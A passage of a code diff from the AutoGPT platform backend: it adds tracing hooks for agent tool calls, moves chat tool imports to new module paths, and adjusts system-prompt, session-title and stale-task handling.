+    hooks via ``merge_hooks(security_hooks, tracing_hooks)``; a plain
+    ``{**a, **b}`` keeps only the last matcher list for each event name.
+
+    Args:
+        tracer: The active TracedSession instance
+
+    Returns:
+        Hooks configuration dict for ClaudeAgentOptions; ``{}`` if tracing is off
+    """
+    if not tracer.enabled:
+        return {}
+
+    try:
+        from claude_agent_sdk import HookMatcher
+        from claude_agent_sdk.types import HookContext, HookInput, SyncHookJSONOutput
+
+        async def trace_pre_tool_use(
+            input_data: HookInput,
+            tool_use_id: str | None,
+            context: HookContext,
+        ) -> SyncHookJSONOutput:
+            """Record tool start time for accurate duration tracking."""
+            _ = context
+            if not tool_use_id:
+                return {}
+            span = tracer._pending_tools.get(tool_use_id)
+            if span is not None:  # already tracked: update in place, don't orphan it
+                span.start_time = time.perf_counter()
+                return {}
+            tool_input = input_data.get("tool_input", {})
+            tracer._pending_tools[tool_use_id] = ToolSpan(
+                tool_call_id=tool_use_id,
+                tool_name=str(input_data.get("tool_name", "unknown")),
+                input=tool_input if isinstance(tool_input, dict) else {},
+            )
+            return {}
+
+        async def trace_post_tool_use(
+            input_data: HookInput,
+            tool_use_id: str | None,
+            context: HookContext,
+        ) -> SyncHookJSONOutput:
+            """Record tool completion for duration calculation."""
+            _ = context
+            if tool_use_id and tool_use_id in tracer._pending_tools:
+                tracer._pending_tools[tool_use_id].end_time = time.perf_counter()
+                tracer._pending_tools[tool_use_id].success = True
+            return {}
+
+        async def trace_post_tool_failure(
+            input_data: HookInput,
+            tool_use_id: str | None,
+            context: HookContext,
+        ) -> SyncHookJSONOutput:
+            """Record tool failures for error tracking."""
+            _ = context
+            if tool_use_id and tool_use_id in tracer._pending_tools:
+                tracer._pending_tools[tool_use_id].end_time = time.perf_counter()
+                tracer._pending_tools[tool_use_id].success = False
+                error = input_data.get("error", "Unknown error")
+                tracer._pending_tools[tool_use_id].output = f"ERROR: {error}"
+            return {}
+
+        return {
+            "PreToolUse": [HookMatcher(matcher="*", hooks=[trace_pre_tool_use])],
+            "PostToolUse": [HookMatcher(matcher="*", hooks=[trace_post_tool_use])],
+            "PostToolUseFailure": [
+                HookMatcher(matcher="*", hooks=[trace_post_tool_failure])
+            ],
+        }
+
+    except ImportError:
+        logger.debug("[Tracing] SDK not available for hook-based tracing")
+        return {}
+
+
+def merge_hooks(*hook_dicts: dict[str, Any]) -> dict[str, Any]:
+    """Combine several hook configurations without losing any matcher.
+
+    For every event name the matcher lists are concatenated in argument
+    order, so security and tracing hooks can coexist. Inputs are not mutated.
+
+    Usage:
+        combined = merge_hooks(security_hooks, tracing_hooks)
+
+    Returns a new dict mapping each event name to its combined matcher list.
+    """
+    merged: dict[str, list[Any]] = {}
+    for hooks in hook_dicts:
+        for event_name, matchers in hooks.items():
+            merged.setdefault(event_name, []).extend(matchers)
+    return merged
--- a/autogpt_platform/backend/backend/api/features/chat/service.py
+++ b/autogpt_platform/backend/backend/api/features/chat/service.py
@@ -27,7 +27,6 @@ from openai.types.chat import (
    ChatCompletionToolParam,
 )

-from backend.data.db_accessors import chat_db
 from backend.data.redis_client import get_redis_async
 from backend.data.understanding import (
    format_understanding_for_prompt,
@@ -36,6 +35,7 @@ from backend.data.understanding import (
 from backend.util.exceptions import NotFoundError
 from backend.util.settings import AppEnvironment, Settings

+from . import db as chat_db
 from . import stream_registry
 from .config import ChatConfig
 from .model import (
@@ -245,12 +245,16 @@ async def _get_system_prompt_template(context: str) -> str:
    return DEFAULT_SYSTEM_PROMPT.format(users_information=context)


-async def _build_system_prompt(user_id: str | None) -> tuple[str, Any]:
+async def _build_system_prompt(
+    user_id: str | None, has_conversation_history: bool = False
+) -> tuple[str, Any]:
    """Build the full system prompt including business understanding if available.

    Args:
-        user_id: The user ID for fetching business understanding
-                     If "default" and this is the user's first session, will use "onboarding" instead.
+        user_id: The user ID for fetching business understanding.
+        has_conversation_history: Whether there's existing conversation history.
+            If True, we don't tell the model to greet/introduce (since they're
+            already in a conversation).

    Returns:
        Tuple of (compiled prompt string, business understanding object)
@@ -266,6 +270,8 @@ async def _build_system_prompt(user_id: str | None) -> tuple[str, Any]:

    if understanding:
        context = format_understanding_for_prompt(understanding)
+    elif has_conversation_history:
+        context = "No prior understanding saved yet. Continue the existing conversation naturally."
    else:
        context = "This is the first time you are meeting the user. Greet them and introduce them to the platform"

@@ -374,7 +380,6 @@ async def stream_chat_completion(

    Raises:
        NotFoundError: If session_id is invalid
-        ValueError: If max_context_messages is exceeded

    """
    completion_start = time.monotonic()
@@ -459,8 +464,9 @@ async def stream_chat_completion(

    # Generate title for new sessions on first user message (non-blocking)
    # Check: is_user_message, no title yet, and this is the first user message
-    if is_user_message and message and not session.title:
-        user_messages = [m for m in session.messages if m.role == "user"]
+    user_messages = [m for m in session.messages if m.role == "user"]
+    first_user_msg = message or (user_messages[0].content if user_messages else None)
+    if is_user_message and first_user_msg and not session.title:
        if len(user_messages) == 1:
            # First user message - generate title in background
            import asyncio
@@ -468,7 +474,7 @@ async def stream_chat_completion(
            # Capture only the values we need (not the session object) to avoid
            # stale data issues when the main flow modifies the session
            captured_session_id = session_id
-            captured_message = message
+            captured_message = first_user_msg
            captured_user_id = user_id

            async def _update_title():
@@ -800,13 +806,9 @@ async def stream_chat_completion(
        # Build the messages list in the correct order
        messages_to_save: list[ChatMessage] = []

-        # Add assistant message with tool_calls if any.
-        # Use extend (not assign) to preserve tool_calls already added by
-        # _yield_tool_call for long-running tools.
+        # Add assistant message with tool_calls if any
        if accumulated_tool_calls:
-            if not assistant_response.tool_calls:
-                assistant_response.tool_calls = []
-            assistant_response.tool_calls.extend(accumulated_tool_calls)
+            assistant_response.tool_calls = accumulated_tool_calls
            logger.info(
                f"Added {len(accumulated_tool_calls)} tool calls to assistant message"
            )
@@ -1237,7 +1239,7 @@ async def _stream_chat_chunks(

                total_time = (time_module.perf_counter() - stream_chunks_start) * 1000
                logger.info(
-                    f"[TIMING] _stream_chat_chunks COMPLETED in {total_time/1000:.1f}s; "
+                    f"[TIMING] _stream_chat_chunks COMPLETED in {total_time / 1000:.1f}s; "
                    f"session={session.session_id}, user={session.user_id}",
                    extra={"json_fields": {**log_meta, "total_time_ms": total_time}},
                )
@@ -1408,9 +1410,13 @@ async def _yield_tool_call(
                operation_id=operation_id,
            )

-            # Attach the tool_call to the current turn's assistant message
-            # (or create one if this is a tool-only response with no text).
-            session.add_tool_call_to_current_turn(tool_calls[yield_idx])
+            # Save assistant message with tool_call FIRST (required by LLM)
+            assistant_message = ChatMessage(
+                role="assistant",
+                content="",
+                tool_calls=[tool_calls[yield_idx]],
+            )
+            session.messages.append(assistant_message)

            # Then save pending tool result
            pending_message = ChatMessage(
@@ -1744,7 +1750,7 @@ async def _update_pending_operation(
    This is called by background tasks when long-running operations complete.
    """
    # Update the message in database
-    updated = await chat_db().update_tool_message_content(
+    updated = await chat_db.update_tool_message_content(
        session_id=session_id,
        tool_call_id=tool_call_id,
        new_content=result,
--- a/autogpt_platform/backend/backend/api/features/chat/service_test.py
+++ b/autogpt_platform/backend/backend/api/features/chat/service_test.py
--- a/autogpt_platform/backend/backend/api/features/chat/stream_registry.py
+++ b/autogpt_platform/backend/backend/api/features/chat/stream_registry.py
@@ -814,6 +814,28 @@ async def get_active_task_for_session(
                if task_user_id and user_id != task_user_id:
                    continue

+                # Auto-expire stale tasks that exceeded stream_timeout
+                created_at_str = meta.get("created_at", "")
+                if created_at_str:
+                    try:
+                        created_at = datetime.fromisoformat(created_at_str)
+                        age_seconds = (
+                            datetime.now(timezone.utc) - created_at
+                        ).total_seconds()
+                        if age_seconds > config.stream_timeout:
+                            logger.warning(
+                                f"[TASK_LOOKUP] Auto-expiring stale task {task_id[:8]}... "
+                                f"(age={age_seconds:.0f}s > timeout={config.stream_timeout}s)"
+                            )
+                            await mark_task_completed(task_id, "failed")
+                            continue
+                    except (ValueError, TypeError):
+                        pass
+
+                logger.info(
+                    f"[TASK_LOOKUP] Found running task {task_id[:8]}... for session {session_id[:8]}..."
+                )
+
                # Get the last message ID from Redis Stream
                stream_key = _get_task_stream_key(task_id)
                last_id = "0-0"
--- a/autogpt_platform/backend/backend/api/features/chat/tools/IDEAS.md
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/IDEAS.md
--- a/autogpt_platform/backend/backend/api/features/chat/tools/init.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/init.py
@@ -3,8 +3,8 @@ from typing import TYPE_CHECKING, Any

 from openai.types.chat import ChatCompletionToolParam

-from backend.copilot.model import ChatSession
-from backend.copilot.tracking import track_tool_called
+from backend.api.features.chat.model import ChatSession
+from backend.api.features.chat.tracking import track_tool_called

 from .add_understanding import AddUnderstandingTool
 from .agent_output import AgentOutputTool
@@ -27,7 +27,7 @@ from .workspace_files import (
 )

 if TYPE_CHECKING:
-    from backend.copilot.response_model import StreamToolOutputAvailable
+    from backend.api.features.chat.response_model import StreamToolOutputAvailable

 logger = logging.getLogger(__name__)

--- a/autogpt_platform/backend/backend/api/features/chat/tools/_test_data.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/_test_data.py
@@ -6,11 +6,11 @@ import pytest
 from prisma.types import ProfileCreateInput
 from pydantic import SecretStr

+from backend.api.features.chat.model import ChatSession
 from backend.api.features.store import db as store_db
 from backend.blocks.firecrawl.scrape import FirecrawlScrapeBlock
 from backend.blocks.io import AgentInputBlock, AgentOutputBlock
 from backend.blocks.llm import AITextGeneratorBlock
-from backend.copilot.model import ChatSession
 from backend.data.db import prisma
 from backend.data.graph import Graph, Link, Node, create_graph
 from backend.data.model import APIKeyCredentials
--- a/autogpt_platform/backend/backend/api/features/chat/tools/add_understanding.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/add_understanding.py
@@ -3,9 +3,11 @@
 import logging
 from typing import Any

-from backend.copilot.model import ChatSession
-from backend.data.db_accessors import understanding_db
-from backend.data.understanding import BusinessUnderstandingInput
+from backend.api.features.chat.model import ChatSession
+from backend.data.understanding import (
+    BusinessUnderstandingInput,
+    upsert_business_understanding,
+)

 from .base import BaseTool
 from .models import ErrorResponse, ToolResponseBase, UnderstandingUpdatedResponse
@@ -97,9 +99,7 @@ and automations for the user's specific needs."""
        ]

        # Upsert with merge
-        understanding = await understanding_db().upsert_business_understanding(
-            user_id, input_data
-        )
+        understanding = await upsert_business_understanding(user_id, input_data)

        # Build current understanding summary (filter out empty values)
        current_understanding = {
--- a/autogpt_platform/backend/backend/api/features/chat/tools/agent_generator/init.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/agent_generator/init.py
--- a/autogpt_platform/backend/backend/api/features/chat/tools/agent_generator/core.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/agent_generator/core.py
@@ -5,8 +5,9 @@ import re
 import uuid
 from typing import Any, NotRequired, TypedDict

-from backend.data.db_accessors import graph_db, library_db, store_db
-from backend.data.graph import Graph, Link, Node
+from backend.api.features.library import db as library_db
+from backend.api.features.store import db as store_db
+from backend.data.graph import Graph, Link, Node, get_graph, get_store_listed_graphs
 from backend.util.exceptions import DatabaseError, NotFoundError

 from .service import (
@@ -144,9 +145,8 @@ async def get_library_agent_by_id(
    Returns:
        LibraryAgentSummary if found, None otherwise
    """
-    db = library_db()
    try:
-        agent = await db.get_library_agent_by_graph_id(user_id, agent_id)
+        agent = await library_db.get_library_agent_by_graph_id(user_id, agent_id)
        if agent:
            logger.debug(f"Found library agent by graph_id: {agent.name}")
            return LibraryAgentSummary(
@@ -163,7 +163,7 @@ async def get_library_agent_by_id(
        logger.debug(f"Could not fetch library agent by graph_id {agent_id}: {e}")

    try:
-        agent = await db.get_library_agent(agent_id, user_id)
+        agent = await library_db.get_library_agent(agent_id, user_id)
        if agent:
            logger.debug(f"Found library agent by library_id: {agent.name}")
            return LibraryAgentSummary(
@@ -215,7 +215,7 @@ async def get_library_agents_for_generation(
        List of LibraryAgentSummary with schemas and recent executions for sub-agent composition
    """
    try:
-        response = await library_db().list_library_agents(
+        response = await library_db.list_library_agents(
            user_id=user_id,
            search_term=search_query,
            page=1,
@@ -272,7 +272,7 @@ async def search_marketplace_agents_for_generation(
        List of LibraryAgentSummary with full input/output schemas
    """
    try:
-        response = await store_db().get_store_agents(
+        response = await store_db.get_store_agents(
            search_query=search_query,
            page=1,
            page_size=max_results,
@@ -286,7 +286,7 @@ async def search_marketplace_agents_for_generation(
            return []

        graph_ids = [agent.agent_graph_id for agent in agents_with_graphs]
-        graphs = await graph_db().get_store_listed_graphs(*graph_ids)
+        graphs = await get_store_listed_graphs(*graph_ids)

        results: list[LibraryAgentSummary] = []
        for agent in agents_with_graphs:
@@ -673,10 +673,9 @@ async def save_agent_to_library(
        Tuple of (created Graph, LibraryAgent)
    """
    graph = json_to_graph(agent_json)
-    db = library_db()
    if is_update:
-        return await db.update_graph_in_library(graph, user_id)
-    return await db.create_graph_in_library(graph, user_id)
+        return await library_db.update_graph_in_library(graph, user_id)
+    return await library_db.create_graph_in_library(graph, user_id)


 def graph_to_json(graph: Graph) -> dict[str, Any]:
@@ -736,14 +735,12 @@ async def get_agent_as_json(
    Returns:
        Agent as JSON dict or None if not found
    """
-    db = graph_db()
-
-    graph = await db.get_graph(agent_id, version=None, user_id=user_id)
+    graph = await get_graph(agent_id, version=None, user_id=user_id)

    if not graph and user_id:
        try:
-            library_agent = await library_db().get_library_agent(agent_id, user_id)
-            graph = await db.get_graph(
+            library_agent = await library_db.get_library_agent(agent_id, user_id)
+            graph = await get_graph(
                library_agent.graph_id, version=None, user_id=user_id
            )
        except NotFoundError:
--- a/autogpt_platform/backend/backend/api/features/chat/tools/agent_generator/errors.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/agent_generator/errors.py
--- a/autogpt_platform/backend/backend/api/features/chat/tools/agent_generator/service.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/agent_generator/service.py
--- a/autogpt_platform/backend/backend/api/features/chat/tools/agent_output.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/agent_output.py
@@ -7,9 +7,10 @@ from typing import Any

 from pydantic import BaseModel, field_validator

+from backend.api.features.chat.model import ChatSession
+from backend.api.features.library import db as library_db
 from backend.api.features.library.model import LibraryAgent
-from backend.copilot.model import ChatSession
-from backend.data.db_accessors import execution_db, library_db
+from backend.data import execution as execution_db
 from backend.data.execution import ExecutionStatus, GraphExecution, GraphExecutionMeta

 from .base import BaseTool
@@ -164,12 +165,10 @@ class AgentOutputTool(BaseTool):
        Resolve agent from provided identifiers.
        Returns (library_agent, error_message).
        """
-        lib_db = library_db()
-
        # Priority 1: Exact library agent ID
        if library_agent_id:
            try:
-                agent = await lib_db.get_library_agent(library_agent_id, user_id)
+                agent = await library_db.get_library_agent(library_agent_id, user_id)
                return agent, None
            except Exception as e:
                logger.warning(f"Failed to get library agent by ID: {e}")
@@ -183,7 +182,7 @@ class AgentOutputTool(BaseTool):
                return None, f"Agent '{store_slug}' not found in marketplace"

            # Find in user's library by graph_id
-            agent = await lib_db.get_library_agent_by_graph_id(user_id, graph.id)
+            agent = await library_db.get_library_agent_by_graph_id(user_id, graph.id)
            if not agent:
                return (
                    None,
@@ -195,7 +194,7 @@ class AgentOutputTool(BaseTool):
        # Priority 3: Fuzzy name search in library
        if agent_name:
            try:
-                response = await lib_db.list_library_agents(
+                response = await library_db.list_library_agents(
                    user_id=user_id,
                    search_term=agent_name,
                    page_size=5,
@@ -229,11 +228,9 @@ class AgentOutputTool(BaseTool):
        Fetch execution(s) based on filters.
        Returns (single_execution, available_executions_meta, error_message).
        """
-        exec_db = execution_db()
-
        # If specific execution_id provided, fetch it directly
        if execution_id:
-            execution = await exec_db.get_graph_execution(
+            execution = await execution_db.get_graph_execution(
                user_id=user_id,
                execution_id=execution_id,
                include_node_executions=False,
@@ -243,7 +240,7 @@ class AgentOutputTool(BaseTool):
            return execution, [], None

        # Get completed executions with time filters
-        executions = await exec_db.get_graph_executions(
+        executions = await execution_db.get_graph_executions(
            graph_id=graph_id,
            user_id=user_id,
            statuses=[ExecutionStatus.COMPLETED],
@@ -257,7 +254,7 @@ class AgentOutputTool(BaseTool):

        # If only one execution, fetch full details
        if len(executions) == 1:
-            full_execution = await exec_db.get_graph_execution(
+            full_execution = await execution_db.get_graph_execution(
                user_id=user_id,
                execution_id=executions[0].id,
                include_node_executions=False,
@@ -265,7 +262,7 @@ class AgentOutputTool(BaseTool):
            return full_execution, [], None

        # Multiple executions - return latest with full details, plus list of available
-        full_execution = await exec_db.get_graph_execution(
+        full_execution = await execution_db.get_graph_execution(
            user_id=user_id,
            execution_id=executions[0].id,
            include_node_executions=False,
@@ -383,7 +380,7 @@ class AgentOutputTool(BaseTool):
            and not input_data.store_slug
        ):
            # Fetch execution directly to get graph_id
-            execution = await execution_db().get_graph_execution(
+            execution = await execution_db.get_graph_execution(
                user_id=user_id,
                execution_id=input_data.execution_id,
                include_node_executions=False,
@@ -395,7 +392,7 @@ class AgentOutputTool(BaseTool):
                )

            # Find library agent by graph_id
-            agent = await library_db().get_library_agent_by_graph_id(
+            agent = await library_db.get_library_agent_by_graph_id(
                user_id, execution.graph_id
            )
            if not agent:
--- a/autogpt_platform/backend/backend/api/features/chat/tools/agent_search.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/agent_search.py
@@ -4,7 +4,8 @@ import logging
 import re
 from typing import Literal

-from backend.data.db_accessors import library_db, store_db
+from backend.api.features.library import db as library_db
+from backend.api.features.store import db as store_db
 from backend.util.exceptions import DatabaseError, NotFoundError

 from .models import (
@@ -44,10 +45,8 @@ async def _get_library_agent_by_id(user_id: str, agent_id: str) -> AgentInfo | N
    Returns:
        AgentInfo if found, None otherwise
    """
-    lib_db = library_db()
-
    try:
-        agent = await lib_db.get_library_agent_by_graph_id(user_id, agent_id)
+        agent = await library_db.get_library_agent_by_graph_id(user_id, agent_id)
        if agent:
            logger.debug(f"Found library agent by graph_id: {agent.name}")
            return AgentInfo(
@@ -72,7 +71,7 @@ async def _get_library_agent_by_id(user_id: str, agent_id: str) -> AgentInfo | N
        )

    try:
-        agent = await lib_db.get_library_agent(agent_id, user_id)
+        agent = await library_db.get_library_agent(agent_id, user_id)
        if agent:
            logger.debug(f"Found library agent by library_id: {agent.name}")
            return AgentInfo(
@@ -134,7 +133,7 @@ async def search_agents(
    try:
        if source == "marketplace":
            logger.info(f"Searching marketplace for: {query}")
-            results = await store_db().get_store_agents(search_query=query, page_size=5)
+            results = await store_db.get_store_agents(search_query=query, page_size=5)
            for agent in results.agents:
                agents.append(
                    AgentInfo(
@@ -160,7 +159,7 @@ async def search_agents(

            if not agents:
                logger.info(f"Searching user library for: {query}")
-                results = await library_db().list_library_agents(
+                results = await library_db.list_library_agents(
                    user_id=user_id,  # type: ignore[arg-type]
                    search_term=query,
                    page_size=10,
--- a/autogpt_platform/backend/backend/api/features/chat/tools/base.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/base.py
@@ -5,8 +5,8 @@ from typing import Any

 from openai.types.chat import ChatCompletionToolParam

-from backend.copilot.model import ChatSession
-from backend.copilot.response_model import StreamToolOutputAvailable
+from backend.api.features.chat.model import ChatSession
+from backend.api.features.chat.response_model import StreamToolOutputAvailable

 from .models import ErrorResponse, NeedLoginResponse, ToolResponseBase

--- a/autogpt_platform/backend/backend/api/features/chat/tools/create_agent.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/create_agent.py
@@ -3,7 +3,7 @@
 import logging
 from typing import Any

-from backend.copilot.model import ChatSession
+from backend.api.features.chat.model import ChatSession

 from .agent_generator import (
    AgentGeneratorNotConfiguredError,
--- a/autogpt_platform/backend/backend/api/features/chat/tools/customize_agent.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/customize_agent.py
@@ -3,9 +3,9 @@
 import logging
 from typing import Any

+from backend.api.features.chat.model import ChatSession
+from backend.api.features.store import db as store_db
 from backend.api.features.store.exceptions import AgentNotFoundError
-from backend.copilot.model import ChatSession
-from backend.data.db_accessors import store_db as get_store_db

 from .agent_generator import (
    AgentGeneratorNotConfiguredError,
@@ -137,8 +137,6 @@ class CustomizeAgentTool(BaseTool):

        creator_username, agent_slug = parts

-        store_db = get_store_db()
-
        # Fetch the marketplace agent details
        try:
            agent_details = await store_db.get_store_agent_details(
--- a/autogpt_platform/backend/backend/api/features/chat/tools/edit_agent.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/edit_agent.py
@@ -3,7 +3,7 @@
 import logging
 from typing import Any

-from backend.copilot.model import ChatSession
+from backend.api.features.chat.model import ChatSession

 from .agent_generator import (
    AgentGeneratorNotConfiguredError,
--- a/autogpt_platform/backend/backend/api/features/chat/tools/find_agent.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/find_agent.py
@@ -2,7 +2,7 @@

 from typing import Any

-from backend.copilot.model import ChatSession
+from backend.api.features.chat.model import ChatSession

 from .agent_search import search_agents
 from .base import BaseTool
--- a/autogpt_platform/backend/backend/api/features/chat/tools/find_block.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/find_block.py
@@ -3,18 +3,17 @@ from typing import Any

 from prisma.enums import ContentType

-from backend.blocks import get_block
-from backend.blocks._base import BlockType
-from backend.copilot.model import ChatSession
-from backend.copilot.tools.base import BaseTool, ToolResponseBase
-from backend.copilot.tools.models import (
+from backend.api.features.chat.model import ChatSession
+from backend.api.features.chat.tools.base import BaseTool, ToolResponseBase
+from backend.api.features.chat.tools.models import (
    BlockInfoSummary,
    BlockInputFieldInfo,
    BlockListResponse,
    ErrorResponse,
    NoResultsResponse,
 )
-from backend.data.db_accessors import search
+from backend.api.features.store.hybrid_search import unified_hybrid_search
+from backend.data.block import BlockType, get_block

 logger = logging.getLogger(__name__)

@@ -107,7 +106,7 @@ class FindBlockTool(BaseTool):

        try:
            # Search for blocks using hybrid search
-            results, total = await search().unified_hybrid_search(
+            results, total = await unified_hybrid_search(
                query=query,
                content_types=[ContentType.BLOCK],
                page=1,
--- a/autogpt_platform/backend/backend/api/features/chat/tools/find_block_test.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/find_block_test.py
@@ -4,13 +4,13 @@ from unittest.mock import AsyncMock, MagicMock, patch

 import pytest

-from backend.blocks._base import BlockType
-from backend.copilot.tools.find_block import (
+from backend.api.features.chat.tools.find_block import (
    COPILOT_EXCLUDED_BLOCK_IDS,
    COPILOT_EXCLUDED_BLOCK_TYPES,
    FindBlockTool,
 )
-from backend.copilot.tools.models import BlockListResponse
+from backend.api.features.chat.tools.models import BlockListResponse
+from backend.data.block import BlockType

 from ._test_data import make_session

@@ -76,12 +76,12 @@ class TestFindBlockFiltering:
            }.get(block_id)

        with patch(
-            "backend.copilot.tools.find_block.unified_hybrid_search",
+            "backend.api.features.chat.tools.find_block.unified_hybrid_search",
            new_callable=AsyncMock,
            return_value=(search_results, 2),
        ):
            with patch(
-                "backend.copilot.tools.find_block.get_block",
+                "backend.api.features.chat.tools.find_block.get_block",
                side_effect=mock_get_block,
            ):
                tool = FindBlockTool()
@@ -120,12 +120,12 @@ class TestFindBlockFiltering:
            }.get(block_id)

        with patch(
-            "backend.copilot.tools.find_block.unified_hybrid_search",
+            "backend.api.features.chat.tools.find_block.unified_hybrid_search",
            new_callable=AsyncMock,
            return_value=(search_results, 2),
        ):
            with patch(
-                "backend.copilot.tools.find_block.get_block",
+                "backend.api.features.chat.tools.find_block.get_block",
                side_effect=mock_get_block,
            ):
                tool = FindBlockTool()
--- a/autogpt_platform/backend/backend/api/features/chat/tools/find_library_agent.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/find_library_agent.py
@@ -2,7 +2,7 @@

 from typing import Any

-from backend.copilot.model import ChatSession
+from backend.api.features.chat.model import ChatSession

 from .agent_search import search_agents
 from .base import BaseTool
--- a/autogpt_platform/backend/backend/api/features/chat/tools/get_doc_page.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/get_doc_page.py
@@ -4,9 +4,9 @@ import logging
 from pathlib import Path
 from typing import Any

-from backend.copilot.model import ChatSession
-from backend.copilot.tools.base import BaseTool
-from backend.copilot.tools.models import (
+from backend.api.features.chat.model import ChatSession
+from backend.api.features.chat.tools.base import BaseTool
+from backend.api.features.chat.tools.models import (
    DocPageResponse,
    ErrorResponse,
    ToolResponseBase,
--- a/autogpt_platform/backend/backend/api/features/chat/tools/helpers.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/helpers.py
--- a/autogpt_platform/backend/backend/api/features/chat/tools/models.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/models.py
@@ -335,11 +335,17 @@ class BlockInfoSummary(BaseModel):
    name: str
    description: str
    categories: list[str]
-    input_schema: dict[str, Any]
-    output_schema: dict[str, Any]
+    input_schema: dict[str, Any] = Field(
+        default_factory=dict,
+        description="Full JSON schema for block inputs",
+    )
+    output_schema: dict[str, Any] = Field(
+        default_factory=dict,
+        description="Full JSON schema for block outputs",
+    )
    required_inputs: list[BlockInputFieldInfo] = Field(
        default_factory=list,
-        description="List of required input fields for this block",
+        description="List of input fields for this block",
    )


@@ -352,7 +358,7 @@ class BlockListResponse(ToolResponseBase):
    query: str
    usage_hint: str = Field(
        default="To execute a block, call run_block with block_id set to the block's "
-        "'id' field and input_data containing the required fields from input_schema."
+        "'id' field and input_data containing the fields listed in required_inputs."
    )


--- a/autogpt_platform/backend/backend/api/features/chat/tools/run_agent.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/run_agent.py
@@ -5,12 +5,16 @@ from typing import Any

 from pydantic import BaseModel, Field, field_validator

-from backend.copilot.config import ChatConfig
-from backend.copilot.model import ChatSession
-from backend.copilot.tracking import track_agent_run_success, track_agent_scheduled
-from backend.data.db_accessors import graph_db, library_db, user_db
+from backend.api.features.chat.config import ChatConfig
+from backend.api.features.chat.model import ChatSession
+from backend.api.features.chat.tracking import (
+    track_agent_run_success,
+    track_agent_scheduled,
+)
+from backend.api.features.library import db as library_db
 from backend.data.graph import GraphModel
 from backend.data.model import CredentialsMetaInput
+from backend.data.user import get_user_by_id
 from backend.executor import utils as execution_utils
 from backend.util.clients import get_scheduler_client
 from backend.util.exceptions import DatabaseError, NotFoundError
@@ -196,7 +200,7 @@ class RunAgentTool(BaseTool):

            # Priority: library_agent_id if provided
            if has_library_id:
-                library_agent = await library_db().get_library_agent(
+                library_agent = await library_db.get_library_agent(
                    params.library_agent_id, user_id
                )
                if not library_agent:
@@ -205,7 +209,9 @@ class RunAgentTool(BaseTool):
                        session_id=session_id,
                    )
                # Get the graph from the library agent
-                graph = await graph_db().get_graph(
+                from backend.data.graph import get_graph
+
+                graph = await get_graph(
                    library_agent.graph_id,
                    library_agent.graph_version,
                    user_id=user_id,
@@ -516,7 +522,7 @@ class RunAgentTool(BaseTool):
        library_agent = await get_or_create_library_agent(graph, user_id)

        # Get user timezone
-        user = await user_db().get_user_by_id(user_id)
+        user = await get_user_by_id(user_id)
        user_timezone = get_user_timezone_or_utc(user.timezone if user else timezone)

        # Create schedule
--- a/autogpt_platform/backend/backend/api/features/chat/tools/run_agent_test.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/run_agent_test.py
--- a/autogpt_platform/backend/backend/api/features/chat/tools/run_block.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/run_block.py
@@ -7,16 +7,15 @@ from typing import Any

 from pydantic_core import PydanticUndefined

-from backend.blocks import get_block
-from backend.blocks._base import AnyBlockSchema
-from backend.copilot.model import ChatSession
-from backend.copilot.tools.find_block import (
+from backend.api.features.chat.model import ChatSession
+from backend.api.features.chat.tools.find_block import (
    COPILOT_EXCLUDED_BLOCK_IDS,
    COPILOT_EXCLUDED_BLOCK_TYPES,
 )
-from backend.data.db_accessors import workspace_db
+from backend.data.block import AnyBlockSchema, get_block
 from backend.data.execution import ExecutionContext
 from backend.data.model import CredentialsFieldInfo, CredentialsMetaInput
+from backend.data.workspace import get_or_create_workspace
 from backend.integrations.creds_manager import IntegrationCredentialsManager
 from backend.util.exceptions import BlockError

@@ -190,7 +189,7 @@ class RunBlockTool(BaseTool):

        try:
            # Get or create user's workspace for CoPilot file operations
-            workspace = await workspace_db().get_or_create_workspace(user_id)
+            workspace = await get_or_create_workspace(user_id)

            # Generate synthetic IDs for CoPilot context
            # Each chat session is treated as its own agent with one continuous run
--- a/autogpt_platform/backend/backend/api/features/chat/tools/run_block_test.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/run_block_test.py
@@ -4,9 +4,9 @@ from unittest.mock import MagicMock, patch

 import pytest

-from backend.blocks._base import BlockType
-from backend.copilot.tools.models import ErrorResponse
-from backend.copilot.tools.run_block import RunBlockTool
+from backend.api.features.chat.tools.models import ErrorResponse
+from backend.api.features.chat.tools.run_block import RunBlockTool
+from backend.data.block import BlockType

 from ._test_data import make_session

@@ -39,7 +39,7 @@ class TestRunBlockFiltering:
        input_block = make_mock_block("input-block-id", "Input Block", BlockType.INPUT)

        with patch(
-            "backend.copilot.tools.run_block.get_block",
+            "backend.api.features.chat.tools.run_block.get_block",
            return_value=input_block,
        ):
            tool = RunBlockTool()
@@ -65,7 +65,7 @@ class TestRunBlockFiltering:
        )

        with patch(
-            "backend.copilot.tools.run_block.get_block",
+            "backend.api.features.chat.tools.run_block.get_block",
            return_value=smart_block,
        ):
            tool = RunBlockTool()
@@ -89,7 +89,7 @@ class TestRunBlockFiltering:
        )

        with patch(
-            "backend.copilot.tools.run_block.get_block",
+            "backend.api.features.chat.tools.run_block.get_block",
            return_value=standard_block,
        ):
            tool = RunBlockTool()
--- a/autogpt_platform/backend/backend/api/features/chat/tools/search_docs.py
+++ b/autogpt_platform/backend/backend/api/features/chat/tools/search_docs.py
@@ -5,16 +5,16 @@ from typing import Any

 from prisma.enums import ContentType

